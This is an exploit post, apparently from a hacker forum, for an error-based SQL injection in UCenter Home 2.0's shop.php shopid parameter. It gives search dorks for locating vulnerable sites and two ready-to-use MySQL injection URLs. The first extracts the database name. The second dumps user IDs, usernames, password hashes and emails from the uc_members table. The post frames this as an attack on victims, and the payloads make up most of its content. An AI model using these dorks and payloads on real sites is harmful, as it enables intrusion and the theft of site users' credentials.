__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim's database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okay.
Edit the DB: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion, and edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1